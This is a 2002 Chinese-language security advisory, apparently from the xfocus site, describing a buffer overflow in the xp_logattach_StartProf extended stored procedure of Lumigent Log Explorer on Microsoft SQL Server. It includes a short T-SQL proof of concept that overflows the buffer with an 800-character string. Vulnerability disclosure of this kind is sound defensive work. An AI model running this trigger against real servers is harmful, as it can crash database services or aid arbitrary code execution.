xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Lumigent Log Explorer XP_LogAttach_StartProf存在缓冲溢出


发布时间:2002-06-17
更新时间:2002-06-17
严重程度:
威胁程度:普通用户访问权限
错误类型:边界检查错误
利用方式:服务器模式

BUGTRAQ ID:5016

受影响系统
Lumigent Log Explorer 3.0 1
   - Microsoft SQL Server 7.0
   - Microsoft SQL Server 7.0 SP1
   - Microsoft SQL Server 7.0 SP2
   - Microsoft SQL Server 7.0 SP3
   - Microsoft SQL Server 2000
   - Microsoft SQL Server 2000 SP1
   - Microsoft SQL Server 2000 SP2
详细描述
Lumigent Log Explorer中的xp_logattach.dll存在缓冲溢出,确切的说是存在于xp_logattach_StartProf存储过程中。

如果成功利用,就可以导致攻击者提供指令覆盖内存,以SQL服务程序的进程权限执行任意命令,默认情况下,SQL服务以非特权用户运行。

需要注意的是扩展存储过程默认只有dbo用户能运行。

测试代码
declare @bo varchar(8000)
set @bo = replicate('A', 800)
exec xp_logattach_StartProf @bo

解决方案
尚无

相关信息
martin rakhmanoff <jimmers@yandex.ru>.
参考:http://online.securityfocus.com/archive/1/277026
http://online.securityfocus.com/archive/1/276954
相关主页:http://www.lumigent.com/LogExplorer/